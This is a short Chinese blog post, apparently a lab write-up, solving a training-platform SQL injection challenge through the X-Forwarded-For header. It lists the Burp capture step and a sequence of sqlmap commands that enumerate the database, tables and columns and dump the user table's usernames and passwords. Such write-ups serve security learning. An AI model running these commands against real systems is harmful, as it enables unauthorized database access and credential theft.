---------------------

X-forwarded-for注入漏洞实战

1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;

 

随便输入用户名密码登录,提示有ip信息,根据题目的意思是信息是根据x-forwarded-for的纸变得,所以本题存在x-forwarded-for注入
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示,速度比较慢,请耐心等待

 

 

 

 

 

2#sqlmap -r 1.txt --current-db --batch    //爆出数据库
3#sqlmap -r 1.txt -D 
webcalendar --tables  //爆出表
4#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列
5#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码


这是墨者平台的一道注入题







 







            

            
posted @ 
 
豆沙包的沙 
阅读(1234) 
评论(0编辑 
收藏 
举报


        

	    
	    
    









    
    

    
    



    

        
    

        

            
                
                
            
        

    

编辑推荐:



· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
    

· go语言实现终端里的倒计时
    

· 如何编写易于单元测试的代码
    

· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
    

· .NET Core 中如何实现缓存的预热?
    



    

    阅读排行:
    

 ·          分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
        

 ·          25岁的心里话
        

 ·          基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
        

 ·          ollama系列01:轻松3步本地部署deepseek,普通电脑可用
        

 ·          按钮权限的设计及实现
        



    

    



	

	

	
	

	

	

	





    

        
  

  
  

  
  
  

  
  

  
  
  
  
  

    


    
    








  

  
点击右上角即可分享

  微信分享提示